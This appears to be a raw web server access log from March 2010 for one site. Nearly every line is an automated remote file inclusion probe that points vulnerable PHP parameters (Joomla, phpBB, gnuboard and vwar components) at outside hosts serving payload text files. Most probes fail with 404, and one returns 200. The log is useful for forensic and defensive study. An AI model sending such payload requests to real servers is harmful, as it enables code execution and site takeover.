85.158.210.37 - - [01/Mar/2010:08:11:28 -0800] "GET /logs/access_100201.log//ams/amboard/write_filter.php?_SERVER[DOCUMENT_ROOT]=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [01/Mar/2010:08:11:43 -0800] "GET /logs///nullpo/hsList.php?subdir=http://calcetto5.maxdema.net//components/com_login/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
85.158.210.37 - - [01/Mar/2010:08:12:20 -0800] "GET /logs//ams/amboard/write_filter.php?_SERVER[DOCUMENT_ROOT]=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.158.210.37 - - [01/Mar/2010:08:12:20 -0800] "GET /ams/amboard/write_filter.php?_SERVER[DOCUMENT_ROOT]=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.158.210.37 - - [01/Mar/2010:08:12:20 -0800] "GET /logs/access_100221.log//ams/amboard/write_filter.php?_SERVER[DOCUMENT_ROOT]=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.158.210.37 - - [01/Mar/2010:08:12:20 -0800] "GET /logs/access_100201.log//ams/amboard/write_filter.php?_SERVER[DOCUMENT_ROOT]=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [01/Mar/2010:08:14:22 -0800] "GET /logs///administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [01/Mar/2010:08:14:22 -0800] "GET //administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [01/Mar/2010:08:14:22 -0800] "GET /logs/access_100128.log%20%20///administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.171.218.166 - - [01/Mar/2010:08:14:22 -0800] "GET /logs/access_100118.log%20%20///administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.171.218.166 - - [01/Mar/2010:08:14:22 -0800] "GET //administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.171.218.166 - - [01/Mar/2010:08:14:22 -0800] "GET /logs///administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.171.218.166 - - [01/Mar/2010:08:14:22 -0800] "GET //administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.171.218.166 - - [01/Mar/2010:08:14:22 -0800] "GET /logs///administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.171.218.166 - - [01/Mar/2010:08:14:22 -0800] "GET /logs/access_100118.log%20%20///administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [01/Mar/2010:08:14:23 -0800] "GET /logs///administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [01/Mar/2010:08:14:23 -0800] "GET //administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [01/Mar/2010:08:14:23 -0800] "GET /logs/access_100128.log%20%20///administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [01/Mar/2010:08:14:28 -0800] "GET /logs/access_100118.log%20%20///administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [01/Mar/2010:08:14:29 -0800] "GET /logs/access_100118.log%20%20///administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.171.218.166 - - [01/Mar/2010:08:14:52 -0800] "GET //administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [01/Mar/2010:08:14:53 -0800] "GET //administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [01/Mar/2010:08:14:53 -0800] "GET //administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.171.218.166 - - [01/Mar/2010:08:14:54 -0800] "GET //administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.171.218.166 - - [01/Mar/2010:08:14:56 -0800] "GET /logs///administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.171.218.166 - - [01/Mar/2010:08:14:56 -0800] "GET /logs/access_100118.log///administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.171.218.166 - - [01/Mar/2010:08:14:56 -0800] "GET /logs/access_100207.log///administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [01/Mar/2010:08:14:58 -0800] "GET /logs/access_100118.log///administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [01/Mar/2010:08:14:58 -0800] "GET /logs///administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [01/Mar/2010:08:14:58 -0800] "GET /logs/access_100207.log///administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [01/Mar/2010:08:14:58 -0800] "GET /logs///administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [01/Mar/2010:08:14:58 -0800] "GET /logs/access_100118.log///administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [01/Mar/2010:08:14:59 -0800] "GET /logs/access_100207.log///administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.171.218.166 - - [01/Mar/2010:08:14:59 -0800] "GET /logs///administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.171.218.166 - - [01/Mar/2010:08:14:59 -0800] "GET /logs/access_100118.log///administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.171.218.166 - - [01/Mar/2010:08:14:59 -0800] "GET /logs/access_100207.log///administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.171.218.166 - - [01/Mar/2010:08:15:02 -0800] "GET /logs/access_100207.log%20%20///administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.171.218.166 - - [01/Mar/2010:08:15:06 -0800] "GET /logs/access_100207.log%20%20///administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:08:15:42 -0800] "GET /logs//admin.php?vwar_root=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:08:15:42 -0800] "GET /admin.php?vwar_root=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:08:15:42 -0800] "GET /logs/access_100219.log%20%20//admin.php?vwar_root=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.99.231.20 - - [01/Mar/2010:08:15:47 -0800] "GET //administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.99.231.20 - - [01/Mar/2010:08:15:47 -0800] "GET /logs/access_100128.log///administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.99.231.20 - - [01/Mar/2010:08:15:47 -0800] "GET /logs/access_100118.log///administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.99.231.20 - - [01/Mar/2010:08:15:47 -0800] "GET /logs///administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.99.231.20 - - [01/Mar/2010:08:16:31 -0800] "GET /logs/access_100128.log///administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.99.231.20 - - [01/Mar/2010:08:16:42 -0800] "GET /logs/access_100118.log///administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [01/Mar/2010:08:17:27 -0800] "GET /codebb/lang_select?phpbb_root_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [01/Mar/2010:08:17:27 -0800] "GET /logs//codebb/lang_select?phpbb_root_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [01/Mar/2010:08:17:27 -0800] "GET /logs/access_100217.log%20%20//codebb/lang_select?phpbb_root_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [01/Mar/2010:08:17:46 -0800] "GET /logs/access_100203.log%20%20//codebb/lang_select?phpbb_root_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:08:18:29 -0800] "GET /logs/access_100219.log%20%20//admin.php?vwar_root=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:08:18:29 -0800] "GET /admin.php?vwar_root=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:08:18:29 -0800] "GET /logs//admin.php?vwar_root=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [01/Mar/2010:08:19:11 -0800] "GET /logs/access_100217.log%20%20//bbs///////good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [01/Mar/2010:08:19:11 -0800] "GET /bbs///////good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [01/Mar/2010:08:19:11 -0800] "GET /logs//bbs///////good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [01/Mar/2010:08:19:21 -0800] "GET /logs//performs.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [01/Mar/2010:08:19:21 -0800] "GET /performs.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [01/Mar/2010:08:19:21 -0800] "GET /logs/access_100210.log%20%20//performs.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [01/Mar/2010:08:19:35 -0800] "GET /logs/access_100218.log%20%20//bbs///////good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:08:19:49 -0800] "GET /logs/access_100209.log%20%20//init_basic.php?GALLERY_BASEDIR=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:08:19:50 -0800] "GET /init_basic.php?GALLERY_BASEDIR=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:08:19:50 -0800] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:08:20:22 -0800] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:08:20:23 -0800] "GET /init_basic.php?GALLERY_BASEDIR=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.181.94.213 - - [01/Mar/2010:08:21:19 -0800] "GET /ideal/forum/viewtopic.php?p=21584 HTTP/1.1" 404 5258 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "www.puaga.com"
218.55.227.145 - - [01/Mar/2010:08:21:21 -0800] "GET //login.php?dir=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [01/Mar/2010:08:21:21 -0800] "GET /logs/access_100201.log%20%20///login.php?dir=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [01/Mar/2010:08:21:21 -0800] "GET /logs///login.php?dir=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [01/Mar/2010:08:21:51 -0800] "GET /logs/access_100203.log%20%20//write_comment_update.php?board.skin.path=http://www.mosdj.com/images/large/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [01/Mar/2010:08:21:51 -0800] "GET /write_comment_update.php?board.skin.path=http://www.mosdj.com/images/large/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [01/Mar/2010:08:21:51 -0800] "GET /logs//write_comment_update.php?board.skin.path=http://www.mosdj.com/images/large/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [01/Mar/2010:08:22:03 -0800] "GET /logs/access_100206.log%20%20//write_comment_update.php?board.skin.path=http://www.mosdj.com/images/large/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.171.218.166 - - [01/Mar/2010:08:22:13 -0800] "GET /logs//bbs/////delete_comment.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.171.218.166 - - [01/Mar/2010:08:22:13 -0800] "GET /bbs/////delete_comment.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.171.218.166 - - [01/Mar/2010:08:22:13 -0800] "GET /logs/access_100118.log%20%20//bbs/////delete_comment.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.171.218.166 - - [01/Mar/2010:08:22:14 -0800] "GET /bbs/////delete_comment.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.171.218.166 - - [01/Mar/2010:08:22:14 -0800] "GET /logs/access_100118.log%20%20//bbs/////delete_comment.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.171.218.166 - - [01/Mar/2010:08:22:14 -0800] "GET /logs//bbs/////delete_comment.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [01/Mar/2010:08:22:14 -0800] "GET /logs//bbs/////delete_comment.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [01/Mar/2010:08:22:14 -0800] "GET /bbs/////delete_comment.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [01/Mar/2010:08:22:14 -0800] "GET /bbs/////delete_comment.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [01/Mar/2010:08:22:14 -0800] "GET /logs//bbs/////delete_comment.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [01/Mar/2010:08:22:14 -0800] "GET /logs/access_100128.log%20%20//bbs/////delete_comment.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [01/Mar/2010:08:22:14 -0800] "GET /logs/access_100128.log%20%20//bbs/////delete_comment.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.87.240.120 - - [01/Mar/2010:08:22:15 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.leaderpmc.com/banner/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:08:22:15 -0800] "GET /logs//index.php?page=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:08:22:15 -0800] "GET /logs/access_100211.log%20%20//index.php?page=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:08:22:17 -0800] "GET /index.php?page=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
213.171.218.166 - - [01/Mar/2010:08:22:19 -0800] "GET /bbs/////delete_comment.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [01/Mar/2010:08:22:22 -0800] "GET /logs/access_100118.log%20%20//bbs/////delete_comment.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [01/Mar/2010:08:22:22 -0800] "GET /logs/access_100201.log///login.php?dir=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [01/Mar/2010:08:22:23 -0800] "GET /bbs/////delete_comment.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.171.218.166 - - [01/Mar/2010:08:22:23 -0800] "GET /bbs/////delete_comment.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [01/Mar/2010:08:22:23 -0800] "GET /logs/access_100118.log%20%20//bbs/////delete_comment.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [01/Mar/2010:08:22:24 -0800] "GET /bbs/////delete_comment.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:08:22:26 -0800] "GET /logs/access_100121.log%20%20//index.php?page=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.171.218.166 - - [01/Mar/2010:08:22:26 -0800] "GET /logs//bbs/////delete_comment.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.171.218.166 - - [01/Mar/2010:08:22:26 -0800] "GET /logs/access_100118.log//bbs/////delete_comment.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.171.218.166 - - [01/Mar/2010:08:22:27 -0800] "GET /logs/access_100118.log//bbs/////delete_comment.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.171.218.166 - - [01/Mar/2010:08:22:27 -0800] "GET /logs//bbs/////delete_comment.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.171.218.166 - - [01/Mar/2010:08:22:28 -0800] "GET /logs/access_100207.log//bbs/////delete_comment.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [01/Mar/2010:08:22:29 -0800] "GET /logs//bbs/////delete_comment.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [01/Mar/2010:08:22:30 -0800] "GET /logs/access_100118.log//bbs/////delete_comment.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [01/Mar/2010:08:22:30 -0800] "GET /logs//bbs/////delete_comment.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [01/Mar/2010:08:22:30 -0800] "GET /logs/access_100118.log//bbs/////delete_comment.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [01/Mar/2010:08:22:31 -0800] "GET /logs/access_100207.log//bbs/////delete_comment.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [01/Mar/2010:08:22:31 -0800] "GET /logs/access_100207.log//bbs/////delete_comment.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [01/Mar/2010:08:22:50 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [01/Mar/2010:08:22:50 -0800] "GET /admin.php?vwar_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [01/Mar/2010:08:22:50 -0800] "GET /logs/access_100201.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [01/Mar/2010:08:22:50 -0800] "GET /logs/access_100219.log%20%20//admin.php?vwar_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [01/Mar/2010:08:22:50 -0800] "GET /logs//admin.php?vwar_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [01/Mar/2010:08:22:50 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.99.231.20 - - [01/Mar/2010:08:22:53 -0800] "GET /logs//bbs/////delete_comment.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.99.231.20 - - [01/Mar/2010:08:22:53 -0800] "GET /bbs/////delete_comment.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.99.231.20 - - [01/Mar/2010:08:22:53 -0800] "GET /logs/access_100128.log//bbs/////delete_comment.php?board_skin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:08:22:54 -0800] "GET /logs//index.php?page=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
